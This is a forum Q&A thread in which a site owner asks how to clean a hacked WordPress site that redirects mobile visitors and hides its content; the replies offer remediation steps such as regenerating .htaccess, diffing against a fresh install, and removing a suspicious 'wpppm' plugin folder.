I have been trying to clean a wordpress website that has been "hacked".

If the site is opened in a mobile phone it redirects to a rumanian site. I have seen how to solve that problem because it is in the .htaccess:

But the problem is that also the content that is loaded in the site is missing, I can't find the script that is removing the content (this happens both on mobile and desktop).

Any ideas how to solve it?

I have checked all of this with no luck: http://codex.wordpress.org/FAQ_My_site_was_hacked http://ottopress.com/2011/how-to-cope-with-a-hacked-site/

  • Remove this htaccess, deactivate all plugins, click save permalinks in WP Admin Panel. It will generate new, clean htaccess – Mateusz Nowak Jan 26 '14 at 15:47

take wordpress fresh install, put it in github repo, take a copy of the site and put it in the same folder and update the repo, you will see which pages has been changed ;) – Jorge Y. C. Rodriguez Jan 26 '14 at 15:47
  • You can export content by some plugins or inbuilt functions and do a fresh install like @jycr753 pointed out. – Mateusz Nowak Jan 26 '14 at 15:49
  • ok, will check that way and update here with the results. thanks – codek Jan 26 '14 at 16:08

Go into wp-content/plugins and remove the wpppm folder as well as updating your .htaccess file. I ran into this today.

  • I believe I have the same hack on my website. However I can't see the 'wpppm' folder in my plugins. But I'm getting emails saying that folder has been modified. Is there a way the hacker can hide files and folders from me on FTP? – KVDD Nov 26 '14 at 23:35
  • hey, i know this is old, but i just came across this hack and im wondering if anyone knows how sites get infected like this to begin with? – Erik Mar 23 '15 at 20:36
  • From the research I did, it appears the hack came in through a Wordpress add-on. – Jason Taylor Mar 13 '16 at 16:08
